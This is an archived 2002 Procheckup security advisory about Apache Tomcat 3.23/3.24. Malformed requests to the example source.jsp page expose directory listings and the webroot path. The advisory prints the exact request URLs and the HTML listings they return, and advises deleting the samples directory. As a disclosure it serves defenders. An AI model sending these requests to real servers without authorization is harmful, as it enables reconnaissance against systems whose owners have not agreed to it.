('binary' encoding is not supported, stored as-is) Procheckup Ltd www.procheckup.com Procheckup Security Bulletin PR02-05 Description: Tomcat source.jsp directory listing and webroot location display Date: 8/1/2002 Application: Apache Tomcat Java server versions 3.23 and 3.24 Platform: Linux/Unix Severity: Remote attackers can obtain listings of web directories and sometines the location of webroot Authors: Richard Brain [richard.brainat_private] Vendor Status: CVE Candidate: Not assigned Reference: www.procheckup.com/security_info/vuln.html Description: Tomcat is the free opensource Java server, http://jakarta.apache.org/tomcat/. Normally source.jsp is used to look at the source code of programs within the examples directories. A typical request is http://webserver:80/examples/jsp/source.jsp?/jsp/num/numgues s.jsp. We have found by using source.jsp with a malformed input a directory listing is displayed and the location of the webroot is sometimes disclosed. The vulnerabilities may only work on port 8080 rather than port 80, dependant on how the webserver has been configured with Tomcat. Exploits A) Requesting the following url :- http://webserver:80/examples/jsp/source.jsp?? Gives the directory listing and webroot on 3.23, 3.24 just gives a directory listing. <title>Directory Listing</title> <base href="file://localhost/"WEBROOT"/webapps/examples/"><h1>/"WE BROOT"/webapps/examples</h1> <hr> <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="images">images</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="jsp">jsp</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="META-INF">META-INF</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="servlets">servlets</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="WEB-INF">WEB-INF</a><br> B) Requesting the following url :- http://webserver:80/examples/jsp/source.jsp?/jsp/ Gives the directory listing and webroot on 3.23, 3.24 just gives a directory listing on a subdirectory. <title>Directory Listing</title> <base href="file://localhost/"WEBROOT"/webapps/examples/jsp/"><h1> /"WEBROOT"/webapps/examples/jsp</h1> <hr> <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="cal">cal</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="checkbox">checkbox</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="colors">colors</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="dates">dates</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="error">error</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="forward">forward</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="include">include</a><br><img align=middle src="doc:/lib/images/ftp/file.gif" width=32 height=32> <a href="index.html">index.html</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="jsptoserv">jsptoserv</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="num">num</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="plugin">plugin</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="security">security</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="sessions">sessions</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="simpletag">simpletag</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="snp">snp</a><br><img align=middle src="doc:/lib/images/ftp/file.gif" width=32 height=32> <a href="source.jsp">source.jsp</a><br> Solution: Delete the samples directory if not needed. Legal: Copyright 2002 Procheckup Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems , if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
This archive was generated by hypermail 2b30 : Wed May 29 2002 - 16:45:11 PDT